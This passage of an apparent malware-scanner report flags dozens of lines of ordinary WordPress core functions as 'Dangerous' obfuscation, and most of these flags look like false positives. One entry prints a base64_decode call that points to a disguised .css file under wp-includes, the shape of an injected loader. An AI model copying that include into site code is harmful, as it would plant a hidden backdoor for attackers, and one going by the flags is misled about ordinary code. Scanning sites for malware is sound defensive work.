</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$referer_field</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1947</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Original referer field</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1949</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_original_referer_field</span><span style="color: #007700">( </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #0000BB">$jump_back_to </span><span style="color: #007700">= </span><span style="color: #DD0000">'current' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$orig_referer_field</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false Referer URL on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_referer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">early </span><span style="color: #007700">if </span><span style="color: #0000BB">called before wp_validate_redirect</span><span style="color: #007700">() </span><span style="color: #0000BB">is defined</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1976</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_validate_redirect' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1985</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_validate_redirect</span><span style="color: #007700">( </span><span style="color: #0000BB">$ref</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">an integer sum of timestamp with timezone offset</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"L3Zhci93d3cvYmFydG9saW5pL2JhcnRvbGluaS5jb20udWEvd3AtaW5jbHVkZXMvYmxvY2tzL2NvdmVyL3N0eWxlLXJlbC5jc3M="</span><span style="color: #007700">);</span><span style="color: #0000BB">?><?php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2002</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_raw_referer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_unslash</span><span style="color: #007700">( </span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'_wp_http_referer'</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_unslash</span><span style="color: #007700">( </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'HTTP_REFERER'</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2017</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false Original referer URL on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2019</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_original_referer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2026</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_validate_redirect</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_unslash</span><span style="color: #007700">( </span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'_wp_original_http_referer'</span><span style="color: #007700">] ), </span><span style="color: #0000BB">false </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the path was created</span><span style="color: #007700">. </span><span style="color: #0000BB">True </span><span style="color: #007700">if </span><span style="color: #0000BB">path already exists</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2042</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_mkdir_p</span><span style="color: #007700">( </span><span style="color: #0000BB">$target </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">is_dir</span><span style="color: #007700">( </span><span style="color: #0000BB">$target </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">path is absolute</span><span style="color: #007700">, </span><span style="color: #0000BB">false is not absolute</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">path_is_absolute</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( </span><span style="color: #DD0000">'/' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$path</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] || </span><span style="color: #DD0000">'\\' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$path</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2159</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The path with the base </span><span style="color: #007700">or </span><span style="color: #0000BB">absolute path</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2161</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">path_join</span><span style="color: #007700">( </span><span style="color: #0000BB">$base</span><span style="color: #007700">, </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2163</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">( </span><span style="color: #0000BB">$base</span><span style="color: #007700">, </span><span style="color: #DD0000">'/' </span><span style="color: #007700">) . </span><span style="color: #DD0000">'/' </span><span style="color: #007700">. </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Normalized path</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_normalize_path</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wrapper </span><span style="color: #007700">. </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function</span><span style="color: #DD0000">'s preference is the return value of sys_get_temp_dir(),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">does not find a writable location</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Writable temporary directory</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2222</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_temp_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trailingslashit</span><span style="color: #007700">( </span><span style="color: #0000BB">WP_TEMP_DIR </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trailingslashit</span><span style="color: #007700">( </span><span style="color: #0000BB">$temp </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'sys_get_temp_dir' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$date</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$temp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'/tmp/'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2255</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is used to work around certain ACL issues in PHP primarily</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the path is writable</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_is_writable</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">win_is_writable</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2270</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return @</span><span style="color: #0000BB">is_writable</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">win_is_writable</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">win_is_writable</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">. </span><span style="color: #0000BB">uniqid</span><span style="color: #007700">( </span><span style="color: #0000BB">mt_rand</span><span style="color: #007700">() ) . </span><span style="color: #DD0000">'.tmp' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">win_is_writable</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">. </span><span style="color: #DD0000">'/' </span><span style="color: #007700">. </span><span style="color: #0000BB">uniqid</span><span style="color: #007700">( </span><span style="color: #0000BB">mt_rand</span><span style="color: #007700">() ) . </span><span style="color: #DD0000">'.tmp' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">intended to replace </span><span style="color: #007700">`</span><span style="color: #DD0000">date_i18n()</span><span style="color: #007700">` </span><span style="color: #0000BB">without legacy quirks in it</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to produce Unix timestamp</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">accepts a true Unix timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">not summed</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">See wp_upload_dir</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_upload_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_upload_dir</span><span style="color: #007700">( </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">array </span><span style="color: #0000BB">containing the current upload directory</span><span style="color: #DD0000">'s path and URL.</span>
</span>
